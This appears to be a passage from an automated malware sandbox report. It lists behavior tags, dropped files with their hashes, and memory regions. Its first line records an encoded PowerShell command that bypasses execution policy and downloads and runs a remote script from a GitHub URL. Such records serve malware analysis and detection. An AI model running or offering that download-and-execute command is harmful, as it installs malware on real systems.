command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
(the -enc argument is UTF-16LE base64 and decodes to: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the same URL listed under Malware Config)
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\77DB.exe
MD5: 63151e4f7c3972f18a23c0e9996e14ef
SHA1: 5d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256: cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512: f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RES8DF4.tmp
MD5: 13ac54264370cb57c7acd4650b2c3cb7
SHA1: 95c8f746c1c6ee355efda8300d98e911ea560f02
SHA256: e6e46df8317369c5c9043667e44a9f2935eebd0e29ec402a1d5ffbb2d335b761
SHA512: ee1d2486ca81ed1f50b032a018ef0da34e9216a881b6348d524e8540d361117097975c81cf28fc8a98a178429ff1befb8db64930928d80dfe0403a59cd68fbe7
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
MD5: f783019c5dc4a5477d1ffd4f9f512979
SHA1: 37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA256: 4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA512: 64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5: 28d9755addec05c0b24cca50dfe3a92b
SHA1: 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256: abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512: 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.dllMD5
6aa9a969be09d1c14af1e43fccd7b140
SHA1a2dbda03573463f7d121c5e029e55ec549d2de6e
SHA25650c6f81c852855da9c75400c50bfb130beae7e894f2e9493f852e62a83f5373d
SHA512599e9153523603a6ddf83c4444d14c915fe6ecf92bbdadf59455c1faefaedb805882ae2790e411ba4b2f5b8139c460cd3a068a23f3d62c5af15cd24fb1c6e0d2
-
\??\c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\CSC29CC70492A45441EAE8F5CDB5DA5D327.TMPMD5
177bb42e83d266676071c801655f7634
SHA13c864e403526990e060c537343abbdfc8446a795
SHA2562e04902d46abbfe26c1706458c72d629e74ef62422f9a0c8b42987a80e96399e
SHA5125835834417f05bd50623697fed83b6e39a5b59c5981e5c8e1106e518c387b04ab136b8f9e7933a7a7c28b24f4833b195767170149250cbf5a8c114a3b6f2225a
-
\??\c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.cmdlineMD5
e247e0ddb829103d544a5dabcb4d45c4
SHA12e2cb6ab320048c9f47b750aa60e40854e3bd1ed
SHA25626b3a7e2221a2ff618f1585e8566da75b35bf6589669ae3dd4f03e0c6a76d3e2
SHA51282b11f3b7a3f81d3f32fc1d98fe4602f86cd21c1117a1dead58eb8365c7e7669a871531c36f2b8856d89dda20870e422a1e5a679c07eefa43bba94e903c53b6d
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
- memory/372-261-0x0000000000000000-mapping.dmp
- memory/372-281-0x0000021F21AE3000-0x0000021F21AE5000-memory.dmp (Filesize 8KB)
- memory/372-279-0x0000021F21AE0000-0x0000021F21AE2000-memory.dmp (Filesize 8KB)
- memory/372-282-0x0000021F21AE6000-0x0000021F21AE8000-memory.dmp (Filesize 8KB)
- memory/372-312-0x0000021F21AE8000-0x0000021F21AEA000-memory.dmp (Filesize 8KB)
- memory/380-372-0x0000000000000000-mapping.dmp
- memory/508-387-0x0000000000000000-mapping.dmp
- memory/716-369-0x0000000000000000-mapping.dmp
- memory/948-373-0x0000000000000000-mapping.dmp
- memory/1304-379-0x0000000000000000-mapping.dmp
- memory/1504-385-0x0000000000000000-mapping.dmp
- memory/1504-324-0x0000000000000000-mapping.dmp
- memory/1640-253-0x0000012EC1FE6000-0x0000012EC1FE8000-memory.dmp (Filesize 8KB)
- memory/1640-214-0x0000000000000000-mapping.dmp
- memory/1640-252-0x0000012EC1FE3000-0x0000012EC1FE5000-memory.dmp (Filesize 8KB)
- memory/1640-250-0x0000012EC1FE0000-0x0000012EC1FE2000-memory.dmp (Filesize 8KB)
- memory/1676-145-0x0000000000000000-mapping.dmp
- memory/1740-378-0x0000000000000000-mapping.dmp
- memory/1756-129-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1756-162-0x00000190F4820000-0x00000190F4821000-memory.dmp (Filesize 4KB)
- memory/1756-141-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1756-139-0x00000190F1473000-0x00000190F1475000-memory.dmp (Filesize 8KB)
- memory/1756-152-0x00000190F3330000-0x00000190F3331000-memory.dmp (Filesize 4KB)
- memory/1756-138-0x00000190F1470000-0x00000190F1472000-memory.dmp (Filesize 8KB)
- memory/1756-154-0x00000190F1476000-0x00000190F1478000-memory.dmp (Filesize 8KB)
- memory/1756-157-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1756-158-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1756-160-0x00000190F1478000-0x00000190F1479000-memory.dmp (Filesize 4KB)
- memory/1756-161-0x00000190F4490000-0x00000190F4491000-memory.dmp (Filesize 4KB)
- memory/1756-128-0x0000000000000000-mapping.dmp
- memory/1756-137-0x00000190F3EF0000-0x00000190F3EF1000-memory.dmp (Filesize 4KB)
- memory/1756-130-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1756-131-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1756-136-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1756-135-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1756-134-0x00000190F2E80000-0x00000190F2E81000-memory.dmp (Filesize 4KB)
- memory/1756-133-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1756-132-0x00000190F1450000-0x00000190F1452000-memory.dmp (Filesize 8KB)
- memory/1952-148-0x0000000000000000-mapping.dmp
- memory/2264-367-0x0000000000000000-mapping.dmp
- memory/2284-325-0x0000000000000000-mapping.dmp
- memory/2284-461-0x0000000000000000-mapping.dmp
- memory/2364-371-0x0000000000000000-mapping.dmp
- memory/2556-366-0x0000000000000000-mapping.dmp
- memory/2772-119-0x0000000000000000-mapping.dmp
- memory/2772-122-0x00000208FB240000-0x00000208FB63F000-memory.dmp (Filesize 4.0MB)
- memory/2772-124-0x00000208FAE20000-0x00000208FAE22000-memory.dmp (Filesize 8KB)
- memory/2772-125-0x00000208FAE23000-0x00000208FAE25000-memory.dmp (Filesize 8KB)
- memory/2772-127-0x00000208FAE26000-0x00000208FAE27000-memory.dmp (Filesize 4KB)
- memory/2772-126-0x00000208FAE25000-0x00000208FAE26000-memory.dmp (Filesize 4KB)
- memory/2780-388-0x0000000000000000-mapping.dmp
- memory/2816-376-0x0000000000000000-mapping.dmp
- memory/2852-171-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-206-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-176-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-174-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-173-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-186-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-172-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-170-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-177-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-207-0x00000235B77D6000-0x00000235B77D8000-memory.dmp (Filesize 8KB)
- memory/2852-180-0x00000235B77D3000-0x00000235B77D5000-memory.dmp (Filesize 8KB)
- memory/2852-179-0x00000235B77D0000-0x00000235B77D2000-memory.dmp (Filesize 8KB)
- memory/2852-183-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-169-0x0000000000000000-mapping.dmp
- memory/2852-182-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-185-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-181-0x00000235B5F60000-0x00000235B5F62000-memory.dmp (Filesize 8KB)
- memory/2852-248-0x00000235B77D8000-0x00000235B77DA000-memory.dmp (Filesize 8KB)
- memory/2988-363-0x0000000000000000-mapping.dmp
- memory/2996-362-0x0000000000000000-mapping.dmp
- memory/3012-384-0x0000000000000000-mapping.dmp
- memory/3012-323-0x0000000000000000-mapping.dmp
- memory/3036-118-0x0000000000DE0000-0x0000000000DF6000-memory.dmp (Filesize 88KB)
- memory/3180-381-0x0000000000000000-mapping.dmp
- memory/3192-391-0x0000000000000000-mapping.dmp
- memory/3192-403-0x00000207320D0000-0x00000207320D2000-memory.dmp (Filesize 8KB)
- memory/3192-407-0x00000207320D6000-0x00000207320D8000-memory.dmp (Filesize 8KB)
- memory/3192-404-0x00000207320D3000-0x00000207320D5000-memory.dmp (Filesize 8KB)
- memory/3192-433-0x00000207320D8000-0x00000207320D9000-memory.dmp (Filesize 4KB)
- memory/3428-390-0x0000000000000000-mapping.dmp
- memory/3544-380-0x0000000000000000-mapping.dmp
- memory/3648-115-0x0000000000030000-0x0000000000038000-memory.dmp (Filesize 32KB)
- memory/3648-117-0x0000000000400000-0x0000000002EF4000-memory.dmp (Filesize 43.0MB)
- memory/3648-116-0x00000000001C0000-0x00000000001C9000-memory.dmp (Filesize 36KB)
- memory/3744-382-0x0000000000000000-mapping.dmp
- memory/3808-386-0x0000000000000000-mapping.dmp
- memory/3812-389-0x0000000000000000-mapping.dmp
- memory/3868-383-0x0000000000000000-mapping.dmp
- memory/3984-460-0x0000000000000000-mapping.dmp
- memory/4024-377-0x0000000000000000-mapping.dmp
- memory/4040-370-0x0000000000000000-mapping.dmp
- memory/4076-368-0x0000000000000000-mapping.dmp